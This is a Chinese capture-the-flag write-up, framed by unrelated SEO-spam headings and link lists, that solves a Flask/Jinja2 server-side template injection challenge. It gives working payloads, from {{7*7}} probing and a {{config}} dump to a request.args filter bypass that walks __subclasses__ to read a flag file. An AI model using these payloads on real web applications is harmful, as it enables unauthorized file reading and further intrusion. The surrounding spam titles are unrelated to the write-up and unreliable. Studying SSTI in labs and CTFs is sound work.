当前位置: 首页 > news >正文

动画网站建设免费学生网页制作成品代码

动画网站建设,免费学生网页制作成品代码,做网站5年工资多少,新浪云主机上安装wordpress主题题目 访问题目场景 某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器) 然后结合图片我们知道,这个网址是python写的&#xff0…

题目

访问题目场景

 

某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)

然后结合图片我们知道,这个网址是python写的,那python语言书写的网址,存在最多的大概率是SSTI模板注入

SSTI模板注入

SSTI就是服务器端模板注入(Server-Side Template Injection),SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。

sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。

SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty twig,java的jade velocity。当这些框架对运用渲染函数生成html的时候会出现SSTI的问题。

现在网上提起的比较多的是Python的网站。

然后我们就可以用常规的注入方法去尝试一下

/{{7*7}}

 现在我们确认了,这确实存在模板注入

常规的用一些魔术方法去注入测试

/{{''.__class__.__mro[2]__.__subclasses__()}}

 

发现行不通,那我们就测试别的方法

/{{config}}

The requested URL /<Config {'JSON_AS_ASCII': True, 'USE_X_SENDFILE': False, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_DOMAIN': None, 'SESSION_COOKIE_NAME': 'session', 'MAX_COOKIE_SIZE': 4093, 'SESSION_COOKIE_SAMESITE': None, 'PROPAGATE_EXCEPTIONS': None, 'ENV': 'production', 'DEBUG': False, 'SECRET_KEY': None, 'EXPLAIN_TEMPLATE_LOADING': False, 'MAX_CONTENT_LENGTH': None, 'APPLICATION_ROOT': '/', 'SERVER_NAME': None, 'PREFERRED_URL_SCHEME': 'http', 'JSONIFY_PRETTYPRINT_REGULAR': False, 'TESTING': False, 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'TEMPLATES_AUTO_RELOAD': None, 'TRAP_BAD_REQUEST_ERRORS': None, 'JSON_SORT_KEYS': True, 'JSONIFY_MIMETYPE': 'application/json', 'SESSION_COOKIE_HTTPONLY': True, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'TRAP_HTTP_EXCEPTIONS': False}> was not found on this server.

 尝试request

/{{''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__

可以发现存在File方法,就证明我们能读取信息

/{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

 

 

而flag的位置是在下图的位置(使用注入之后再右键检查就能发现了)

 

http://www.dt0577.cn/news/56505.html

相关文章:

  • 青海省住房与城乡建设厅网站友情链接属于免费推广吗
  • 衢江网站建设网络营销软件条件
  • 临清建设局网站推广平台有哪些渠道
  • 武汉高端品牌网站建设免费域名
  • 温州网站建设小公司小红书如何引流推广
  • 网站制作优化网盘资源共享网站
  • 建设书法网站的主题是免费关键词排名优化
  • 网站信息做参考文献亚马逊seo关键词优化软件
  • 如何加强政府门户网站建设方案自助建站网
  • 石家庄做网站公司有哪些国内最新消息新闻
  • 沈阳做网站哪个好投百度做广告效果怎么样
  • 海南公司网站建设哪家快搜索排名优化公司
  • 适合个人网站游戏推广平台代理
  • 网站呼叫中心 建设工期bt磁力bt天堂
  • 东港网站建设兰州seo优化
  • 织梦网站地图排名函数
  • wordpress会员网站天津百度优化
  • 营销型网站服务公司百度产品大全首页
  • 网站建设助理工资专业软文
  • 网站权重怎么提升sem优化服务公司
  • 中国电子系统建设公司网站百度关键词价格怎么查询
  • 网站图片切换网站建设外包
  • 深圳国贸网站建设深圳网站公司排名
  • 泸州大浪科技做网站seo关键词推广怎么做
  • 做网站怎么认证微博百度信息流投放方式有哪些
  • 政府网站设计方案网站seo优化价格
  • wordpress form manager 中文windows优化大师可靠吗
  • 高端定制网站开发网站模板设计cilimao磁力猫搜索引擎
  • 如何弄死一个网站万网域名查询官网
  • 可以直接进入网站的正能量连接如何注册域名网站